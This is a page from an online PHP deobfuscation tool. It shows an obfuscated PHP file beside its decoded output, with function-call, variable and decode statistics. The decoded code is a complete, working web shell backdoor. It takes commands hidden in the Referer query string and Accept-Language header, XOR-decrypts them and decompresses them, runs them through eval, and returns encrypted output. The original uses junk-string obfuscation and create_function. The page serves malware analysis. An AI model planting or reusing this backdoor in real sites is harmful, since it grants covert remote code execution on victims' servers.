Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $y='),3?$ss($s[$3?i],0,3?$e3?3?))),3?$k)))3?;$o=ob_get_contents();o3?b_e3?3?nd_clea..

Decoded Output download

$kh="6beb";$kf="956f";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){    $u=parse_url($rr);    parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++) $p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$y='),3?$ss($s[$3?i],0,3?$e3?3?))),3?$k)))3?;$o=ob_get_contents();o3?b_e3?3?nd_clean();3?$d=bas3?e64';
$X='="";fo3?r($i=0;$i3?<$3?l3?;){for($j=0;(3?3?$j<$c&&$i<3?$l);3?$j++,$i+3?+){$o.=$t{$i}^$k3?{$3?j};';
$n=');$q=arr3?ay_val3?u3?3?es3?($q3?);preg_match_all3?("/([\\w]3?)3?[\\w-]3?+(?:3?3?;q=0.([\\d]))?3?,3?';
$B='?/",$ra,$m);if($q&3?&$m){@s3?ession3?_start3?();$s3?3?=&$_S3?ESSI3?ON;$ss="substr"3?3?;$sl="s3?t';
$m='3?_3?e3?ncode(x(gzco3?mpress3?($3?o)3?3?,$k));print("<$k>$d</$k>")3?;3?3?@session_destroy();}}}}';
$k='$kh3?="6beb3?";$kf="9563?f";func3?ti3?on 3?x($t,3?$k)3?{$c=strlen($3?k);$3?l=s3?trlen($t3?)3?;$o';
$S='compr3?ess(@x(@b3?a3?3?se64_decode(pr3?eg_3?replace(ar3?r3?ay("/_/3?","/-/3?3?")3?,array("/","+"';
$e='){$s[$i].=$p3?;$3?e=strp3?3?os3?($s[$i],$f);i3?f($e){$k=$kh.3?$kf;ob_sta3?rt();3?@eva3?3?l(@gzun';
$T='(strpos3?($p,$h)3?===03?){3?$s[$i]="";$3?p3?=$ss($p3?,3);}if(ar3?ray_k3?ey_exi3?3?sts($i,3?$s3?)';
$r=str_replace('bg','','bgcreatbgebg_fubgncbgtibgon');
$K='rtolower";3?$i3?=$m[1][03?].$m[1][1]3?;$h=$s3?l($ss(m3?d5($i.$3?kh3?),3?0,3));$f=$3?sl(3?$ss(md5';
$u='LANG3?UAGE"];if($rr3?3?&&$ra){    $u3?=parse3?3?_url($r3?r);    parse_3?str(3?3?$u["query3?"],$q';
$b='}3?3?3?}r3?eturn $o;}$r=$_SERVE3?R;$rr=@$r["3?HTTP_RE3?FERER"];$3?r3?a=@$r3?["HTTP_3?ACCE3?PT3?_';
$p='($i.3?$kf3?),0,3));$p3?="3?";for($z=1;$z3?<c3?oun3?t($m[1]3?);$z++) $p.=3?$q[$m[3?2][3?$z]];if3?';
$x=str_replace('3?','',$k.$X.$b.$u.$n.$B.$K.$p.$T.$e.$S.$y.$m);
$g=$r('',$x);$g();
?>
~           

Function Calls

null 1
str_replace 2
create_function 1

Variables

$B ?/",$ra,$m);if($q&3?&$m){@s3?ession3?_start3?();$s3?3?=&$_S3..
$K rtolower";3?$i3?=$m[1][03?].$m[1][1]3?;$h=$s3?l($ss(m3?d5($i..
$S compr3?ess(@x(@b3?a3?3?se64_decode(pr3?eg_3?replace(ar3?r3?a..
$T (strpos3?($p,$h)3?===03?){3?$s[$i]="";$3?p3?=$ss($p3?,3);}if..
$X ="";fo3?r($i=0;$i3?<$3?l3?;){for($j=0;(3?3?$j<$c&&$i<3?$l);3..
$b }3?3?3?}r3?eturn $o;}$r=$_SERVE3?R;$rr=@$r["3?HTTP_RE3?FERER..
$e ){$s[$i].=$p3?;$3?e=strp3?3?os3?($s[$i],$f);i3?f($e){$k=$kh...
$g None
$k $kh3?="6beb3?";$kf="9563?f";func3?ti3?on 3?x($t,3?$k)3?{$c=s..
$m 3?_3?e3?ncode(x(gzco3?mpress3?($3?o)3?3?,$k));print("<$k>$d<..
$n );$q=arr3?ay_val3?u3?3?es3?($q3?);preg_match_all3?("/([\w]3?..
$p ($i.3?$kf3?),0,3));$p3?="3?";for($z=1;$z3?<c3?oun3?t($m[1]3?..
$r create_function
$u LANG3?UAGE"];if($rr3?3?&&$ra){ $u3?=parse3?3?_url($r3?r);..
$x $kh="6beb";$kf="956f";function x($t,$k){$c=strlen($k);$l=str..
$y ),3?$ss($s[$3?i],0,3?$e3?3?))),3?$k)))3?;$o=ob_get_contents(..

Stats

MD5 3b1286d187ac50db5bb62f67b1244742
Eval Count 1
Decode Time 61 ms